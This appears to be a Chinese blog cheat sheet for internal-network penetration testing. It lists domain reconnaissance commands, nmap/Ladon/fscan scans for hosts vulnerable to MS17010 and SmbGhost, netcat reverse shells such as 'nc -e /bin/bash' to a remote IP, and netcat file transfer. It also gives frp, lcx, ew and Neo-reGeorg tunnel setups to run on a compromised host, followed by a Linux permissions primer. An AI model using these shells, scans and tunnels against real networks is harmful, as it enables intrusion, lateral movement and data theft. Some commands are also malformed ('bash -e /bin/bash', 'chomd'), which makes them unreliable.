内网渗透-信息搜集、漏扫、隧道、反弹shell
信息搜集
常规
uname -a
systeminfo 详细信息
netstat -ano 端口列表
route print 路由表
net start 启动服务
tasklist 进程列表
schtasks 计划任务
ipconfig /all 判断存在域
net view /domain 判断存在域
net time /domain 判断主域
netstat -ano 当前网络端口开放
nslookup 域名 追踪来源地址
wmic service list brief 查询本机服务
net config workstation 查询当前登录域及登录用户信息
wmic startup get command,caption 查看已启动的程序信息
whoami /all 用户权限
net config workstation 登录信息
net user 本地用户
net localgroup 本地用户组
net user /domain 获取域用户信息
net group /domain 获取域用户组信息
wmic useraccount get /all 涉及域用户详细信息
net group "Domain Admins" /domain 查询域管理员账户
net group "Enterprise Admins" /domain 查询管理员用户组
net group "Domain Controllers" /domain 查询域控制器
Nmap探测
存活ip
nmap -sP 172.23.40.1/24
存活ip端口
nmap -Pn -n --open 172.23.40.19/24
漏洞扫描
Ladon扫描
Ping 扫描C段存活主机(任意权限
win:
Ladon64.exe 192.168.1.1/24 PingScan
ICMP 扫描C段存活主机(管理员权限
Linux:
chmod +x frps
Ladon64 192.168.1.1/24 IcmpScan
SnmpScan (161.162端口)、T3Scan (WebLogic)、BannerScan (Web站点的Banner)、HttpTitle (Web站点标题)、TcpBanner (开放端口服务信息)
SMB 扫描C段永恒之蓝 MS17010 漏洞主机
Ladon64 192.168.1.1/24 MS17010
SMB 扫描C段永恒之黑 SmbGhost 漏洞主机
Ladon64 192.168.1.1/24 SmbGhost
Fscan扫描
扫描目标 C段,并输出到1.txt
./fscan -h 192.168.1.1/24 -o 1.txt
NC反弹shell
正向连接
Windows
客户端 主动连接服务器的端口
nc.exe -e cmd 192.168.0.18 4444
服务端 开放监听4444端口
nc.exe -lvvp 4444
监听端口是一个开放端口,它接受传入的数据包,并将它们转发到所需的目的应用程序/进程。监听端口并不意味着它被防火墙允许。监听端口仅仅意味着它正在接收某种流量。但是,该流量仍然可以被防火墙阻止。
反向连接
Linux
服务端 将cmd窗口反弹到4444端口
bash -e /bin/bash 172.23.40.132 4444
nc -e /bin/bash 172.23.40.132 4444
客户端 监听4444端口
nc.exe -lvp 4444
nc通信
服务端:
nc -lvvp 4444
客户端:
nc 192.168.0.16 4444
nc文件传输
服务端:
nc -l -p 4444 > test
客户端:
nc 192.168.0.16 4444 < 1.txt #两种客户端必须同为一种操作系统
代理转发
正反代理
LCX代理
lcx.exe -listen 9999 192.168.1.4 80
lcx.exe -slave 192.168.1.3 9999 127.0.0.1 9999
lcx -listen 8888 -forward 192.168.0.10:3389
rdesktop 127.0.0.1:8888
Frp代理
简单来说就是frps用来接受数据包,frpc用来发送请求数据包)
正向代理
frps 客户端监听自己的7000端口
frps.ini配置内容
[common]
bind_port = 7000
攻击机运行frps.ini
chmod +x frps //赋予用户文件的执行权限
./frps -c frps.ini
frpc 服务端连接客户端 7000端口
frpc.ini配置内容
[common]
server_addr = 服务端ip
server_port = 7000
[Socks5]
type = tcp
plugin = socks5
remote_port = 6000
失陷主机运行frpc
./frpc -c frpc.ini
此时,客户端间听的7000端口已经成功和服务器连接,同时开启了6000端口,并建立了socks5代理通道
谷歌配置socks5代理,服务端6000端口
端口映射
将本地3389端口映射到远程主机上的3389端口
frpc.ini
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port =3389
ew代理
一层内网
正向连接
目标网络边界存在公网IP且可任意开监听端口
在 1.1.1.1 主机上通过这个命令开启 8888 端口的 socks 代理
./ew -s ssocksd -l 8888
反向连接
目标网络边界不存在公网 IP,需要通过反弹方式创建 socks 代理
chmod 777 ew_for_linux64
让公网服务器监听6666和6667端口,等待攻击者机器访问6666端口,目标机器访问6667端口。
./ew_for_linux64 -s rcsocks -l 6666 -e 6667
// 在 1.1.1.1 的公网主机添加转接隧道,将 6666 收到的代理请求转交给反连 6667 端口的主机
内网机器执行
ew_for_Win.exe -s rssocks -d vps的ip -e 6667
// 将目标网络的可控边界主机反向连接公网主机
代理挂vps的6666端口
二重内网
2.2.2.3 主机上利用 ssocksd 方式启动 9999 端口的 socks 代理
./ew -s ssocksd -l 9999
将1080端口收到的socks代理请求转发给2.2.2.3的9999端口
./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
Neo-reGeorg
反向代理
在当前目录生成文件夹neoreg_servers 里面有各种环境下的脚本
python neoreg.py generate -k adzuki
将脚本上传到B主机并访问 /tunnel.aspx
python neoreg.py -k adzuki -u http://192.168.31.60/tunnel.aspx
设置代理服务器为 127.0.0.1:1080 socks5代理
判断出网
连通性检测:
1. TCP/UDP协议 nc命令
2. HTTP/HTTPS协议 curl命令
3. ICMP协议 ping命令
4. DNS协议 windows使用 nslookup linux使用 dig
linux权限
读写执行
示例:drwxrwxr-x 8 root root 4096 6月 23 15:18 Simon
解析 "drwxrwxrwx",这个权限说明一共10位。第一位代表文件类型,有两个数值:“d”和“-”,“d”代表目录,“-”代表非目录。
后面9位可以拆分为3组来看,分别对应不同用户:2-4位代表所有者user的权限说明,5-7位代表组群group的权限说明,8-10位代表其他人other的权限说明。
r代表可读权限,w代表可写权限,x代表可执行权限。所以,“drwxrwxrwx” 表示所有用户都对这个目录有可读可写可执行权限。
修改权限
r:读取权限,数字代号为:"4"。
w:写入权限,数字代号为:"2"。
x:执行或切换权限,数字代号为:"1"。
chmod 777 test //给test这个目录赋予所有人可读可写可执行权限,4+2+1=7
u 代表拥有者(user)
g 代表拥有者所在的组群(group)
o 代表其他用户,但不是u和g (other)
a 代表全部的人,也就是包括u,g和o
+:为文件或目录增加权限
-:删除文件或目录的权限
=:设置指定的权限示例:
chomd u+wx test 增加test目录中拥有者可写和可执行的权限
chomd g+wx test 增加test目录中拥有者所在的组群可写和可执行的权限
chmod go-rw test 删除test目录中组群和其他用户的可读和可写的权限除了符号,也可以使用八进制数字来指定具体权限,如下表所示:
0:没有任何权限 :---
1:执行权限 :--x
2:写入权限 :-w-
3:执行权限和写入权限:1 (执行) + 2 (写入) = 3 :-wx
4:读取权限 :r--
5:读取和执行权限:4 (读取) + 1 (执行) = 5 :r-x
6:读取和写入权限:4 (读取) + 2 (写入) = 6 :rw-
7:所有权限: 4 (读取) + 2 (写入) + 1 (执行) = 7 :rwx
示例:
-rw——- (600) 只有所有者才有读和写的权限
-rw-r–r– (644) 只有所有者才有读和写的权限,组群和其他人只有读的权限
-rwx—— (700) 只有所有者才有读,写,执行的权限
-rwxr-xr-x (755) 只有所有者才有读,写,执行的权限,组群和其他人只有读和执行的权限
-rwx–x–x (711) 只有所有者才有读,写,执行的权限,组群和其他人只有执行的权限
-rw-rw-rw- (666) 每个人都有读写的权限
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· PowerShell开发游戏 · 打蜜蜂
· 在鹅厂做java开发是什么体验
· 百万级群聊的设计实践
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战
· 永远不要相信用户的输入:从 SQL 注入攻防看输入验证的重要性